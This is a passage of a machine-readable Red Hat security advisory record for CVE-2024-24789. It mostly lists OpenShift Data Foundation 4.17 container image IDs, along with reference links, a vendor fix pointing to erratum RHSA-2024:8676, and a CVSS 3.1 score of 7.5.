"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-24789", }, { category: "external", summary: "RHBZ#2292668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292668", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-24789", url: "https://www.cve.org/CVERecord?id=CVE-2024-24789", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-24789", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24789", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", 